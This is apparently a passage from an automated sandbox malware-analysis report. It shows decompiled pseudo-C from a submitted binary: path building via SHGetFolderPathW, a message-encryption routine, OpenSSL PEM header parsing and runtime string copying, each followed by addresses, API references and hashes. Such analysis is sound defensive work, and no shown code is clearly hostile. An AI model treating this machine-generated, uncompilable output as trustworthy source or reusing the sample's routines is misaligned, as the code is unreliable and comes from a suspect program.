				void* __ebp;
				_Unknown_base(*)()* _t147;
				void* _t169;
				void* _t173;
				void* _t177;
				void* _t195;
				void* _t203;
				struct HINSTANCE__* _t221;
				signed int _t222;
				void* _t233;
				void* _t235;
				signed int _t238;
				short _t260;
				char _t261;
				intOrPtr _t266;
				void* _t267;
				void* _t268;
				void* _t269;

				_push(0xffffffff);
				_push(0x4caa98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t266;
				_t267 = _t266 - 0x58;
				_v8 = 0;
				_t221 = LoadLibraryW(L"Shell32.dll");
				if(_t221 != 0) {
					_t147 = GetProcAddress(_t221, "SHGetFolderPathW");
					_t259 = _t147;
					E00413A90(_t221,  &_v32, __edi, 0x400);
					_v8 = 1;
					_t254 = _v32;
					 *_t147(0, 0x28, 0, 0, _v32, __edi, __esi);
					_push(_v20);
					_v36 = 7;
					_v40 = 0;
					_v56 = 0;
					E00418400( &_v56, _v32, _v28);
					_v8 = 2;
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t147, "\\");
					_v8 = 3;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t147, "/");
					_v8 = 4;
					E0040F2B0( &_v56,  &_v80,  &_v104);
					_t268 = _t267 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t268 = _t268 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t268 = _t268 + 4;
					}
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t259, "\\");
					_v8 = 5;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t259, "/");
					_v8 = 6;
					E0040F2B0( &_a4,  &_v80,  &_v104);
					_t269 = _t268 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t269 = _t269 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t269 = _t269 + 4;
					}
					_t260 = _v56;
					_t167 =  >=  ? _t260 :  &_v56;
					_t233 =  >=  ? _t260 :  &_v56;
					_v20 =  >=  ? _t260 :  &_v56;
					_t250 =  >=  ? _t260 :  &_v56;
					_t169 = _t233 + _v40 * 2;
					__eflags = ( >=  ? _t260 :  &_v56) - _t169;
					if(( >=  ? _t260 :  &_v56) != _t169) {
						_push(_t233);
						E00418380( &_v20, _t250, _t169, _v20);
						_t269 = _t269 + 0xc;
					}
					_t261 = _a4;
					_t171 =  >=  ? _t261 :  &_a4;
					_t235 =  >=  ? _t261 :  &_a4;
					_v20 =  >=  ? _t261 :  &_a4;
					_t252 =  >=  ? _t261 :  &_a4;
					_t173 = _t235 + _a20 * 2;
					__eflags = ( >=  ? _t261 :  &_a4) - _t173;
					if(( >=  ? _t261 :  &_a4) != _t173) {
						_push(_t235);
						E00418380( &_v20, _t252, _t173, _v20);
						_t269 = _t269 + 0xc;
					}
					_t267 = _t269 - 8;
					_v20 = 0x5c;
					if(E00414D40( &_v56,  &_v20) != 0xffffffff) {
						_t177 = E00413520( &_v56,  &_v104, 0, _t175);
						_t262 = _t177;
						if( &_v56 != _t177) {
							if(_v36 >= 8) {
								L00422587(_v56);
								_t267 = _t267 + 4;
							}
							_v36 = 7;
							_v40 = 0;
							_v56 = 0;
							E004145A0( &_v56, _t262);
						}
						if(_v84 >= 8) {
							L00422587(_v104);
							_t267 = _t267 + 4;
						}
						_t238 = _v40;
						_t180 =  >=  ? _v56 :  &_v56;
						if( *((short*)(( >=  ? _v56 :  &_v56) + _t238 * 2 - 2)) == 0x5c) {
							_t97 = _t238 - 1; // -1
							_t203 = E00413520( &_v56,  &_v104, 0, _t97);
							_t265 = _t203;
							if( &_v56 != _t203) {
								if(_v36 >= 8) {
									L00422587(_v56);
									_t267 = _t267 + 4;
								}
								_v36 = 7;
								_v40 = 0;
								_v56 = 0;
								E004145A0( &_v56, _t265);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						_t239 = _a20;
						_t182 =  >=  ? _a4 :  &_a4;
						if( *((short*)(( >=  ? _a4 :  &_a4) + _a20 * 2 - 2)) == 0x5c) {
							_t239 =  &_a4;
							_t195 = E00413520( &_a4,  &_v104, 0,  &_a4 - 1);
							_t264 = _t195;
							if( &_a4 != _t195) {
								if(_a24 >= 8) {
									L00422587(_a4);
									_t267 = _t267 + 4;
								}
								_a24 = 7;
								_t239 =  &_a4;
								_a20 = 0;
								_a4 = 0;
								E004145A0( &_a4, _t264);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						FreeLibrary(_t221);
						_t185 =  >=  ? _a4 :  &_a4;
						_t222 = _t221 & 0xffffff00 | E00417F00( &_v56, _t239, _v40,  >=  ? _a4 :  &_a4, _a20) == 0x00000000;
					} else {
						FreeLibrary(_t221);
						_t222 = 0;
					}
					if(_v36 >= 8) {
						L00422587(_v56);
						_t267 = _t267 + 4;
					}
					_v36 = 7;
					_v56 = 0;
					_t188 = _v32;
					_v40 = 0;
					if(_v32 != 0) {
						L00422587(_t188);
						_t267 = _t267 + 4;
					}
					goto L41;
				} else {
					_t222 = 0;
					L41:
					if(_a24 >= 8) {
						L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t222;
				}
			}

0x0040f313
0x0040f315
0x0040f320
0x0040f321
0x0040f328
0x0040f331
0x0040f33e
0x0040f342
0x0040f353
0x0040f361
0x0040f363
0x0040f368
0x0040f36c
0x0040f378
0x0040f37a
0x0040f37f
0x0040f38c
0x0040f394
0x0040f398
0x0040f39d
0x0040f3a4
0x0040f3a8
0x0040f3b4
0x0040f3bb
0x0040f3bf
0x0040f3c4
0x0040f3cb
0x0040f3cf
0x0040f3db
0x0040f3e2
0x0040f3e6
0x0040f3ee
0x0040f3f9
0x0040f3fe
0x0040f405
0x0040f40a
0x0040f40f
0x0040f40f
0x0040f414
0x0040f41c
0x0040f423
0x0040f42a
0x0040f42e
0x0040f433
0x0040f438
0x0040f438
0x0040f43b
0x0040f43f
0x0040f44e
0x0040f455
0x0040f459
0x0040f45e
0x0040f465
0x0040f469
0x0040f475
0x0040f47c
0x0040f480
0x0040f488
0x0040f493
0x0040f498
0x0040f49f
0x0040f4a4
0x0040f4a9
0x0040f4a9
0x0040f4ae
0x0040f4b6
0x0040f4bd
0x0040f4c4
0x0040f4c8
0x0040f4cd
0x0040f4d2
0x0040f4d2
0x0040f4db
0x0040f4e7
0x0040f4ea
0x0040f4ed
0x0040f4f0
0x0040f4f6
0x0040f4f9
0x0040f4fb
0x0040f4fd
0x0040f505
0x0040f50a
0x0040f50a
0x0040f513
0x0040f51f
0x0040f522
0x0040f525
0x0040f528
0x0040f52e
0x0040f531
0x0040f533
0x0040f535
0x0040f53d
0x0040f542
0x0040f542
0x0040f545
0x0040f548
0x0040f55e
0x0040f578
0x0040f57d
0x0040f584
0x0040f58a
0x0040f58f
0x0040f594
0x0040f594
0x0040f599
0x0040f5a4
0x0040f5ab
0x0040f5af
0x0040f5af
0x0040f5b8
0x0040f5bd
0x0040f5c2
0x0040f5c2
0x0040f5cc
0x0040f5cf
0x0040f5d9
0x0040f5db
0x0040f5e8
0x0040f5ed
0x0040f5f4
0x0040f5fa
0x0040f5ff
0x0040f604
0x0040f604
0x0040f609
0x0040f614
0x0040f61b
0x0040f61f
0x0040f61f
0x0040f628
0x0040f62d
0x0040f632
0x0040f632
0x0040f628
0x0040f63c
0x0040f63f
0x0040f649
0x0040f655
0x0040f658
0x0040f65d
0x0040f664
0x0040f66a
0x0040f66f
0x0040f674
0x0040f674
0x0040f679
0x0040f681
0x0040f684
0x0040f68b
0x0040f68f
0x0040f68f
0x0040f698
0x0040f69d
0x0040f6a2
0x0040f6a2
0x0040f698
0x0040f6a6
0x0040f6b6
0x0040f6c9
0x0040f560
0x0040f561
0x0040f567
0x0040f567
0x0040f6d2
0x0040f6d7
0x0040f6dc
0x0040f6dc
0x0040f6e1
0x0040f6e8
0x0040f6ec
0x0040f6ef
0x0040f6f8
0x0040f6fb
0x0040f700
0x0040f700
0x00000000
0x0040f344
0x0040f344
0x0040f703
0x0040f707
0x0040f70c
0x0040f711
0x0040f71a
0x0040f724
0x0040f724

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

SHGetFolderPathW, xrefs: 0040F34D
\, xrefs: 0040F548
Shell32.dll, xrefs: 0040F32C

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040CBA0(intOrPtr* __ecx, void* __eflags, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v1124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t127;
				intOrPtr _t129;
				void* _t150;
				void* _t172;
				void* _t173;
				void* _t176;
				void* _t178;
				intOrPtr _t179;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t189;
				void* _t191;

				_push(0xffffffff);
				_push(0x4ca818);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t179;
				_push(_t150);
				_push(_t172);
				_v100 = __ecx;
				_push(0xffffffff);
				_v8 = 1;
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				E00413FF0(_t150,  &_v92,  &_a28, 0);
				_v8 = 2;
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "\n");
				_v8 = 3;
				_push(3);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\\\n");
				_v8 = 4;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t181 = _t179 - 0x458 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t181 = _t181 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t181 = _t181 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, " ");
				_v8 = 5;
				_push(6);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "&#160;");
				_v8 = 6;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t182 = _t181 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t182 = _t182 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t182 = _t182 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "/");
				_v8 = 7;
				_push(2);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\/");
				_v8 = 8;
				_t171 =  &_v44;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t183 = _t182 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t183 = _t183 + 4;
				}
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t183 = _t183 + 4;
				}
				_v20 = E00451D30();
				E0044F960(_t150, _t171, E00452510());
				_t120 =  >=  ? _v92 :  &_v92;
				_t151 = E004524A0(_t178,  >=  ? _v92 :  &_v92, _v76);
				E00452ED0(_t121,  &_v20, 0, 0);
				_t185 = _t183 + 0x1c;
				if(E00450960(_t151, _t171, _v72 - 0x10) == 0) {
					_t176 = E00420C62(_t151, _t171, _t172, E004527A0(_t171, __eflags, _v20));
					_t127 = E00420C62(_t151, _t171, _t172, 0x82);
					__eflags = _a24 - 0x10;
					_t173 = _t127;
					_t165 =  >=  ? _a4 :  &_a4;
					_t129 = _a20 + 1;
					_push(4);
					_push(_v20);
					_push(_t176);
					_push( >=  ? _a4 :  &_a4);
					E004525F0(_t129);
					_t189 = _t185 + 0x20;
					_v96 = _t129;
					__eflags = _t129 - 0xffffffff;
					if(_t129 != 0xffffffff) {
						E0044F5E0(_t151);
						E00451A60(_t171, _t178, _v20);
						_t191 = _t189 + 8;
						 *_v100 = _v96;
					} else {
						E00451FB0(_t151, _t173);
						E00450670(E00450960(_t151, _t171, __eflags), _t173);
						_push(_t173);
						_push("Error encrypting message: %s\n");
						_push(E00420E4D() + 0x40);
						E00422408(_t151, _t173, _t176, __eflags);
						_t191 = _t189 + 0x14;
						_t176 = 0;
					}
				} else {
					E00450670(_t124,  &_v1124);
					_t191 = _t185 + 8;
					_t176 = 0;
				}
				if(_v72 >= 0x10) {
					L00422587(_v92);
					_t191 = _t191 + 4;
				}
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				if(_a24 >= 0x10) {
					L00422587(_a4);
					_t191 = _t191 + 4;
				}
				_a24 = 0xf;
				_a20 = 0;
				_a4 = 0;
				if(_a48 >= 0x10) {
					L00422587(_a28);
				}
				 *[fs:0x0] = _v16;
				return _t176;
			}

0x0040cba3
0x0040cba5
0x0040cbb0
0x0040cbb1
0x0040cbbe
0x0040cbc0
0x0040cbc1
0x0040cbc4
0x0040cbc6
0x0040cbd6
0x0040cbdd
0x0040cbe4
0x0040cbe8
0x0040cbed
0x0040cbf4
0x0040cbfb
0x0040cc02
0x0040cc09
0x0040cc0d
0x0040cc12
0x0040cc19
0x0040cc20
0x0040cc27
0x0040cc2e
0x0040cc32
0x0040cc3a
0x0040cc45
0x0040cc4a
0x0040cc51
0x0040cc56
0x0040cc5b
0x0040cc5b
0x0040cc5e
0x0040cc66
0x0040cc6d
0x0040cc74
0x0040cc78
0x0040cc7d
0x0040cc82
0x0040cc82
0x0040cc85
0x0040cc8f
0x0040cc96
0x0040cc9d
0x0040cca1
0x0040cca6
0x0040ccad
0x0040ccb4
0x0040ccbb
0x0040ccc2
0x0040ccc6
0x0040ccce
0x0040ccd9
0x0040ccde
0x0040cce5
0x0040ccea
0x0040ccef
0x0040ccef
0x0040ccf2
0x0040ccfa
0x0040cd01
0x0040cd08
0x0040cd0c
0x0040cd11
0x0040cd16
0x0040cd16
0x0040cd19
0x0040cd23
0x0040cd2a
0x0040cd31
0x0040cd35
0x0040cd3a
0x0040cd41
0x0040cd48
0x0040cd4f
0x0040cd56
0x0040cd5a
0x0040cd62
0x0040cd67
0x0040cd6d
0x0040cd72
0x0040cd79
0x0040cd7e
0x0040cd83
0x0040cd83
0x0040cd8a
0x0040cd91
0x0040cd98
0x0040cd9c
0x0040cda1
0x0040cda6
0x0040cda6
0x0040cdae
0x0040cdb7
0x0040cdc6
0x0040cdd5
0x0040cdde
0x0040cde3
0x0040cded
0x0040ce1a
0x0040ce21
0x0040ce2c
0x0040ce30
0x0040ce35
0x0040ce39
0x0040ce3a
0x0040ce3c
0x0040ce3f
0x0040ce40
0x0040ce42
0x0040ce47
0x0040ce4a
0x0040ce4d
0x0040ce50
0x0040ce82
0x0040ce8d
0x0040ce95
0x0040ce9b
0x0040ce52
0x0040ce52
0x0040ce5e
0x0040ce66
0x0040ce67
0x0040ce74
0x0040ce75
0x0040ce7a
0x0040ce7d
0x0040ce7d
0x0040cdef
0x0040cdf7
0x0040cdfc
0x0040cdff
0x0040cdff
0x0040cea1
0x0040cea6
0x0040ceab
0x0040ceab
0x0040ceb2
0x0040ceb9
0x0040cec0
0x0040cec4
0x0040cec9
0x0040cece
0x0040cece
0x0040ced5
0x0040cedc
0x0040cee3
0x0040cee7
0x0040ceec
0x0040cef1
0x0040cefb
0x0040cf06

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

 , xrefs: 0040CCAF
\\n, xrefs: 0040CC1B
Error encrypting message: %s, xrefs: 0040CE67

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00463350(void* __ebx, void* __edx, void* __ebp, char _a4, intOrPtr* _a8) {
				void* __edi;
				intOrPtr _t12;
				void* _t13;
				char _t16;
				intOrPtr _t19;
				signed int _t22;
				char _t35;
				void* _t36;
				char* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t40;
				char* _t41;
				void* _t42;
				char* _t43;

				_t45 = __ebp;
				_t38 = __edx;
				_t34 = __ebx;
				_t40 = _a4;
				_t39 = _a8;
				 *_t39 = 0;
				if(_t40 == 0) {
					L26:
					return 1;
				} else {
					_t12 =  *_t40;
					if(_t12 == 0 || _t12 == 0xa) {
						goto L26;
					} else {
						_t13 = E00448190(_t40, "Proc-Type: ", 0xb);
						_t60 = _t13;
						if(_t13 == 0) {
							__eflags =  *((char*)(_t40 + 0xb)) - 0x34;
							if( *((char*)(_t40 + 0xb)) != 0x34) {
								goto L5;
							} else {
								__eflags =  *((char*)(_t40 + 0xc)) - 0x2c;
								if( *((char*)(_t40 + 0xc)) != 0x2c) {
									goto L5;
								} else {
									_t41 = _t40 + 0xd;
									__eflags = E00448190(_t41, "ENCRYPTED", 9);
									if(__eflags == 0) {
										_t16 =  *_t41;
										__eflags = _t16 - 0xa;
										if(_t16 == 0xa) {
											L13:
											__eflags =  *_t41;
											if(__eflags != 0) {
												_t42 = _t41 + 1;
												__eflags = E00448190(_t42, "DEK-Info: ", 0xa);
												if(__eflags == 0) {
													_t43 = _t42 + 0xa;
													__eflags = _t43;
													_t37 = _t43;
													_push(_t34);
													while(1) {
														_t35 =  *_t43;
														__eflags = _t35 - 0x41;
														if(_t35 < 0x41) {
															goto L20;
														}
														__eflags = _t35 - 0x5a;
														if(_t35 <= 0x5a) {
															L22:
															_t43 = _t43 + 1;
															continue;
														}
														L20:
														__eflags = _t35 - 0x2d;
														if(_t35 == 0x2d) {
															goto L22;
														}
														_t6 = _t35 - 0x30; // -48
														__eflags = _t6 - 9;
														if(_t6 <= 9) {
															goto L22;
														}
														 *_t43 = 0;
														_t19 = E0047ECD0(_t37);
														 *_t39 = _t19;
														 *_t43 = _t35;
														_a4 = _t43 + 1;
														_pop(_t36);
														__eflags = _t19;
														if(__eflags != 0) {
															_t22 = E00464360( &_a4, _t39 + 4,  *((intOrPtr*)(_t19 + 0xc)));
															asm("sbb eax, eax");
															return  ~( ~_t22);
														} else {
															E004512D0(_t36, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x72, ".\\crypto\\pem\\pem_lib.c", 0x219);
															__eflags = 0;
															return 0;
														}
														goto L27;
													}
												} else {
													E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x69, ".\\crypto\\pem\\pem_lib.c", 0x200);
													__eflags = 0;
													return 0;
												}
											} else {
												goto L14;
											}
										} else {
											while(1) {
												__eflags = _t16;
												if(__eflags == 0) {
													break;
												}
												_t16 =  *((intOrPtr*)(_t41 + 1));
												_t41 = _t41 + 1;
												__eflags = _t16 - 0xa;
												if(_t16 != 0xa) {
													continue;
												} else {
													goto L13;
												}
												goto L27;
											}
											L14:
											E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x70, ".\\crypto\\pem\\pem_lib.c", 0x1fd);
											__eflags = 0;
											return 0;
										}
									} else {
										E004512D0(__ebx, _t38, _t39, __ebp, __eflags, 9, 0x6b, 0x6a, ".\\crypto\\pem\\pem_lib.c", 0x1f9);
										__eflags = 0;
										return 0;
									}
								}
							}
						} else {
							E004512D0(__ebx, _t38, _t39, __ebp, _t60, 9, 0x6b, 0x6b, ".\\crypto\\pem\\pem_lib.c", 0x1f4);
							L5:
							return 0;
						}
					}
				}
				L27:
			}

0x00463350
0x00463350
0x00463350
0x00463351
0x00463356
0x0046335a
0x00463362
0x004634c7
0x004634cd
0x00463368
0x00463368
0x0046336c
0x00000000
0x0046337a
0x00463382
0x0046338a
0x0046338c
0x004633ab
0x004633af
0x00000000
0x004633b1
0x004633b1
0x004633b5
0x00000000
0x004633b7
0x004633b9
0x004633ca
0x004633cc
0x004633eb
0x004633ed
0x004633ef
0x004633fd
0x004633fd
0x00463400
0x00463421
0x00463430
0x00463432
0x00463451
0x00463451
0x00463454
0x00463456
0x00463457
0x00463457
0x00463459
0x0046345c
0x00000000
0x00000000
0x0046345e
0x00463461
0x0046346f
0x0046346f
0x00000000
0x0046346f
0x00463463
0x00463463
0x00463466
0x00000000
0x00000000
0x00463468
0x0046346b
0x0046346d
0x00000000
0x00000000
0x00463473
0x00463476
0x0046347e
0x00463480
0x00463483
0x00463487
0x00463488
0x0046348a
0x004634b5
0x004634bf
0x004634c5
0x0046348c
0x0046349c
0x004634a4
0x004634a8
0x004634a8
0x00000000
0x0046348a
0x00463434
0x00463444
0x0046344c
0x00463450
0x00463450
0x00000000
0x00000000
0x00000000
0x004633f1
0x004633f1
0x004633f1
0x004633f3
0x00000000
0x00000000
0x004633f5
0x004633f8
0x004633f9
0x004633fb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004633fb
0x00463402
0x00463412
0x0046341a
0x0046341e
0x0046341e
0x004633ce
0x004633de
0x004633e6
0x004633ea
0x004633ea
0x004633cc
0x004633b5
0x0046338e
0x0046339e
0x004633a7
0x004633aa
0x004633aa
0x0046338c
0x0046336c
0x00000000

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

DEK-Info: , xrefs: 00463422
.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
Proc-Type: , xrefs: 0046337C
ENCRYPTED, xrefs: 004633BC

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Uniqueness

Uniqueness Score: -1.00%

Function 004C5D39 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004C5D39(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v32;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t32;
				signed int* _t34;
				signed int _t36;
				signed int _t42;
				signed int _t47;
				char* _t48;
				signed int _t49;
				signed int _t52;
				unsigned int _t58;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t66;
				signed int _t73;
				void* _t78;
				char* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				void* _t89;
				void* _t93;

				_t63 = __edx;
				_t89 = _t93;
				_t78 = E0042501F(__ebx);
				if(_t78 != 0) {
					_push(__ebx);
					__eflags =  *(_t78 + 0x24);
					if( *(_t78 + 0x24) != 0) {
						L7:
						_t79 =  *(_t78 + 0x24);
						_t32 = E0042C0FD(_t79, 0x86, E004C5D13(_a4));
						__eflags = _t32;
						if(_t32 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004242FD(0x86, _t63);
							asm("int3");
							_push(_t89);
							__eflags = _v32;
							_push(_t79);
							if(__eflags != 0) {
								_t80 = _v16;
								__eflags = _t80;
								if(__eflags == 0) {
									goto L10;
								} else {
									_t7 = _t80 - 1; // -1
									_t36 = E0043FF8E(_v20, _t80, E004C5D13(_v12), _t7);
									__eflags = _t36;
									if(_t36 == 0) {
										goto L11;
									} else {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E004242FD(0x86, _t63);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t58 = _v52;
										_push(0);
										__eflags = _t58;
										if(_t58 == 0) {
											L34:
											return _v60;
										} else {
											_push(_t80);
											_push(0x86);
											_t52 = _t58;
											_t83 = _v56;
											__eflags = _t83 & 0x00000003;
											_t73 = _v60;
											if((_t83 & 0x00000003) != 0) {
												while(1) {
													_t42 =  *_t83;
													_t83 = _t83 + 1;
													 *_t73 = _t42;
													_t73 = _t73 + 1;
													_t58 = _t58 - 1;
													__eflags = _t58;
													if(_t58 == 0) {
														goto L26;
													}
													__eflags = _t42;
													if(_t42 == 0) {
														__eflags = _t73 & 0x00000003;
														if((_t73 & 0x00000003) == 0) {
															L30:
															_t52 = _t58;
															_t59 = _t58 >> 2;
															__eflags = _t59;
															if(_t59 != 0) {
																goto L46;
															} else {
																goto L31;
															}
														} else {
															while(1) {
																 *_t73 = _t42;
																_t73 = _t73 + 1;
																_t58 = _t58 - 1;
																__eflags = _t58;
																if(_t58 == 0) {
																	goto L49;
																}
																__eflags = _t73 & 0x00000003;
																if((_t73 & 0x00000003) != 0) {
																	continue;
																} else {
																	goto L30;
																}
																goto L50;
															}
															goto L49;
														}
													} else {
														__eflags = _t83 & 0x00000003;
														if((_t83 & 0x00000003) != 0) {
															continue;
														} else {
															_t52 = _t58;
															_t60 = _t58 >> 2;
															__eflags = _t60;
															if(_t60 != 0) {
																goto L36;
															} else {
																goto L23;
															}
														}
													}
													goto L50;
												}
												goto L26;
											} else {
												_t60 = _t58 >> 2;
												__eflags = _t60;
												if(_t60 != 0) {
													do {
														L36:
														_t47 =  *_t83 ^ 0xffffffff ^ 0x7efefeff +  *_t83;
														_t66 =  *_t83;
														_t83 = _t83 + 4;
														__eflags = _t47 & 0x81010100;
														if((_t47 & 0x81010100) == 0) {
															goto L35;
														} else {
															__eflags = _t66;
															if(_t66 == 0) {
																__eflags = 0;
																 *_t73 = 0;
																goto L45;
															} else {
																__eflags = _t66;
																if(_t66 == 0) {
																	 *_t73 = _t66 & 0x000000ff;
																	goto L45;
																} else {
																	__eflags = _t66 & 0x00ff0000;
																	if((_t66 & 0x00ff0000) == 0) {
																		 *_t73 = _t66 & 0x0000ffff;
																		goto L45;
																	} else {
																		__eflags = _t66 & 0xff000000;
																		if((_t66 & 0xff000000) != 0) {
																			goto L35;
																		} else {
																			 *_t73 = _t66;
																			L45:
																			_t73 = _t73 + 4;
